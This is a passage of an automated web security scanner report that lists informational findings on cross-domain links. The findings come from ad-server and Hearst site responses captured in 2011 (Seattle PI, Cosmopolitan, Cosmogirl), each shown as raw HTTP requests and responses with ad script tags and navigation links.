<script src='http://ad.turn.com/server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26991068&ahcid=2258492&bimpd=ZfCrXJhGSY0Y4IVoRGQFIPDPg0Y_U7_3nhJpO2wUhWxcSqekmrJ-OkxvaBCzY3eZ1pDEEKT32Tu_zkVMBM13YXETQudoxG65t8gPvD3_8uXyApHz0cTr9LeydkTtbIhVaX2nKNkPJtLnVJH8FV4Dd2BZLb2fS1F5Scj_HvzyiMK3eTg-fysVL4NxFZ5v_CHNlgeNc_NrCEydDCc3CvAgfciaxPgesnMeI3JvshK38UBZmdvUBbyfigS7QKd3XwFGLXXmgJH1qmmEMYCR4OpdnlcwHwG_6JrrgxV7HzVF-v697ZaK9XBtZEQvEubwtYTVVBQLLq7j6F3iNOZuKo0JXQPRebdb04CqsJUmdmy5UnsfWiULP-ZEZGDt0IqdLMwBsr6a6YqtrLJT4cqZXQrL0U1Ju8lLS0J5izWRkss6rstwkoE4Thgw2wlkh46ZlsDWqZUn-7KntDl9L8p4pH9fDXaoBUsWtsZZqH0CVvFPBCr_mAo4nf999NQU7V_JRN_j4QimPJYaK6Zn7b8VCPKVAbGFEBRqN0QbGT1SlHKoMnOUwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhdp3jJC_ymtOnz-MeVT9G4f947Yd5VEVT_VqJa1Vb2COvVyAA-f4Y6G0narfvPyHg4AnIT2lP-u4t0jxCVmL47PZzw7Sqi-NDB9GTcO6mju0gCchPaU_67i3SPEJWYvjsw0VVYxOKi1KVJX4e1Hsry-bRohoymHI1165xYwXluCxcKUsk3pyz8E7r6AyUKnzbf23BOOYN5DOwJ7MDeQLuEvq0tQJszidBUwiqxGdKZ-CEvmONAwrRCaTz4lB29IygQ&acp=1.01'></script>
...[SNIP]...
18.120. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316296513555&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1329
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:54:00 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">


<script src='http://ad.turn.com/server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26991068&ahcid=2258492&bimpd=Qry6iq284Zi1fMTNdDxpNjCvgtzo8PLO8tMpbWZ7kvTnVgsAC3RRiT32ikVdGX1hMH0tG3SQtVbaNlHv6FfeTHETQudoxG65t8gPvD3_8uXyApHz0cTr9LeydkTtbIhVaX2nKNkPJtLnVJH8FV4Dd2BZLb2fS1F5Scj_HvzyiMK3eTg-fysVL4NxFZ5v_CHNlgeNc_NrCEydDCc3CvAgfciaxPgesnMeI3JvshK38UDVDHqv4CHtGAnNLHtx7QEuLXXmgJH1qmmEMYCR4OpdnlcwHwG_6JrrgxV7HzVF-v697ZaK9XBtZEQvEubwtYTVVBQLLq7j6F3iNOZuKo0JXQPRebdb04CqsJUmdmy5UnsfWiULP-ZEZGDt0IqdLMwBsr6a6YqtrLJT4cqZXQrL0U1Ju8lLS0J5izWRkss6rstwkoE4Thgw2wlkh46ZlsDWqZUn-7KntDl9L8p4pH9fDXaoBUsWtsZZqH0CVvFPBCr_mAo4nf999NQU7V_JRN_j4QimPJYaK6Zn7b8VCPKVAbGFEBRqN0QbGT1SlHKoMnOUwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhbzeQXEetXFbLTjErKX1F6z947Yd5VEVT_VqJa1Vb2COvVyAA-f4Y6G0narfvPyHg4AnIT2lP-u4t0jxCVmL47PZzw7Sqi-NDB9GTcO6mju0gCchPaU_67i3SPEJWYvjs4xqrYWC46qwOYfu3hndDyJSZI-llQBy1yA5heRW7zlYHhA6Vl3lcfiJZZgyheDhRgsBDmGfDjXnMX2vSEpleyEmpo50ca90u9BSXmAdtLgHsUzp-la3Au1IHTldH8eSwZRfnCdxLbPC3h7TxlbVEY4&acp=1.01'></script>
...[SNIP]...
18.121. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295392631&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 462
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:20 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B139_2770402E_10AB98E&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.122. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295736296&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:41:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27704D7D_10F5909&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.123. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295375688&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B25_27703F6F_10686B6&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.124. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295043061&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 460
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:48:18 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B21_27705E8F_62F543&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.125. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686642

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B139_277024EB_FDAAB8&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.126. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316296146303&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:47:55 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B25_27705D97_1154B25&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.127. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295386536&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:15 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27703FDE_10878AA&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.128. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295386536&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:14 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=300x250&mid=B26_27703FD8_1087620&bp=3.76&sp=2.31&dm=c2VhdHRsZXBpLmNvbQ&cpd=2605"></script>
...[SNIP]...
18.129. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai-status?nocache=0.6197763 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 17 Sep 2011 16:43:51 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...
18.130. http://widget.newsinc.com/_fw/common/toppicks_common1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/common/toppicks_common1.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912 HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 200 OK
x-amz-id-2: F2SMoi1ojZkQww8amJ/BuJf1KiTQ6P4iSeirX6X9XUy80ib2HX5dvQ5rZ6DPT2aa
x-amz-request-id: FD7F4B5B0CF33019
Date: Sat, 17 Sep 2011 16:23:12 GMT
x-amz-meta-cb-modifiedtime: Fri, 09 Sep 2011 17:49:18 GMT
Last-Modified: Fri, 09 Sep 2011 19:53:34 GMT
ETag: "83b0c49b7548eff81af861456c4475c4"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 9269
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>NDN Top Picks Widge
...[SNIP]...
<br />
       If no content appears within 15sec, you may need to download or upgrade the free
       <a href="http://get.adobe.com/flashplayer/" target="_blank">Adobe Flash Player</a>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

   <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-573scDfDoUH6o.gif" style="display: none;"
           border="0" height="1" width="1" alt="Quantcast" />
   </noscript>
...[SNIP]...
18.131. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/cosmogirl/CosmogirlLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:24 GMT
Accept-Ranges: bytes
ETag: "af1fe3af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:38 GMT
Content-Length: 5876
Connection: close

function CosmogirlLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "cosmo
...[SNIP]...
<div id="footer-home" style="border:1px solid #ccc;width:748px;background:url(/cobrands/cosmogirl/images/footer_bg.png) repeat-y">' +
'<a href="http://www.cosmogirl.com/" style="display:block;height:29px;position:relative" >' +
'<img class="pic" src="/cobrands/cosmogirl/images/footer-logo.png" alt="cosmogirl" style="position:aboslute;top:0;left:0" />
...[SNIP]...
<li><a href="http://games.cosmogirl.com/">Games</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/horoscopes/">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/funandgames/virtual-model">Virtual Fashion Model</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/fashion/style-wars/">Style Wars</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/freestuff/">Free Stuff</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/lifeadvice/sex-questions/">Sex Questions</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/funandgames/virtual-model">Virtual Model</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/entertainment/">Entertainment</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/fashion/diy/">Do-It-Yourself Fashion</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/beauty/get-the-look/">Get the Look</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/guys/love-stories/">Love Stories</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/beauty/">Beauty</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/lifeadvice/">Life Advice</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/lifeadvice/cg-wants-to-know/embarrassing-stories-call-out?click=main_sr">Embarrasssing Stories</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/guys/guide-to-guys/">Guide to Guys</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/fashion/">Fashion</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/entertainment/backstory/">Celebrities</a>
...[SNIP]...
<li><a href="http://www.cosmogirl.com/quizzes-url-redirect?click=main_sr">Quizzes</a>
...[SNIP]...
18.132. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:24 GMT
Accept-Ranges: bytes
ETag: "69e4123af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:35 GMT
Content-Length: 9279
Connection: close

function CosmopolitanLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "co
...[SNIP]...
<div class="links" style="margin-left:0;border-left:13px solid #000000;border-bottom:13px solid #000000;padding-bottom:18px;`">' +
'<a style="display:block" href="http://www.cosmopolitan.com/" >' +
'<img class="pic" src="/cobrands/cosmopolitan/images/footer-logo.png" alt="cosmopolitan" style="margin:0 0 18px 8px" />
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/positions/">Sex Positions</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/archive/you/quiz/">Cosmo Quizzes</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/tips/">Sex Tips From Guys</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/body-language/">Body Language Decoder</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/makeover/">Virtual Hairstyle Salon</a>
...[SNIP]...
